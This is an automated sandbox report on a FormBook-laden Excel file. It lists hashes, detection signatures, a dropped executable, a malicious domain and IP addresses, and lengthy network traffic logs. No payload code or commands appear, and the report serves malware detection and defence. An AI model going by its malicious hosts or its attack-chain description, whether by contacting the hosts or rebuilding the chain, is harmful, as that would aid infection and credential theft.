Windows Analysis Report
PI#0034250924.xla.xlsx

Overview

General Information

Sample name: PI#0034250924.xla.xlsx
Analysis ID: 1522509
MD5: 7e28f8cffffe2ee9420b3ea7915101a4
SHA1: 83f9b8f410ed49d2de8fcee1d3659deb8d06adcf
SHA256: 2319aa2adb90c44bec9ad97f567b060722bdf5084e7f9b43c65b0feaee993227
Tags: xla, xlsx, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Avira: detection malicious, Label: HEUR/AGEN.1332117
Source: PI#0034250924.xla.xlsx ReversingLabs: Detection: 18%
Source: PI#0034250924.xla.xlsx Virustotal: Detection: 23%
Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Joe Sandbox ML: detected
Source: PI#0034250924.xla.xlsx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Source: global traffic DNS query: name: og1.in
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
